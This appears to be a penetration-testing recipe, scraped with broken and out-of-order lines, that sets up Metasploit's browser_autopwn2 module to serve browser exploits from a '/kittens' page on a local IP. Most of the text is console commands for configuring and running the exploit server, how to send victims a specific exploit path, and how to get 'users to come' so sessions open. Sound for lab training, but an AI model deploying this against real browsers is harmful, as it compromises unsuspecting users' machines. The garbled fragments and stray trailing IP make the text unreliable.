Metasploit Framework includes a huge collection of client-side exploits, many of them are meant to exploit known vulnerabilities in web browsers and there is a module that has the ability to detect the version of browser the client is using and picks the best exploit to trigger, this module is browser_autopwn or browser_autopwn2, in its newest version.
In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.
use auxiliary/server/browser_autopwn2
show options
set SRVHOST 192.168.56.1
/kittens
for the server to respond to:set URIPATH /kittens
set EXCLUDE_PATTERN android|adobe_flash
show advanced
to view the full list of advanced options) for the module to show us the individual path of each exploit launched and be more verbose.set ShowExploitList true set VERBOSE true
Advanced options also allow us to choose the payload and its parameters, such as LHOST and LPORT, for each platform (Windows, Unix, and Android)
run
If we want to trigger a particular exploit, we may use the Path value after our server's URL; for example, if we want the firefox_svg_plugin to trigger, we send http://192.168.56.1/PWrmfJApkwWsf
to the victim; paths are generated randomly each time the module runs.
http://192.168.56.1/kittens
, we will see BAP2 respond immediately and try all fitting exploits, and when it successfully executes one, it creates a session in the background:Browser Autopwn sets up a web server with a main page that uses JavaScript to identify what software the client is running and based on that choose what exploit to try with it.
In this recipe, we set our Kali machine to listen on port 8080 for requests to the kittens
directory. Other options we configured were:
After that, we just need to run the module and make some users to come to our /kittens
site.
3.14.129.194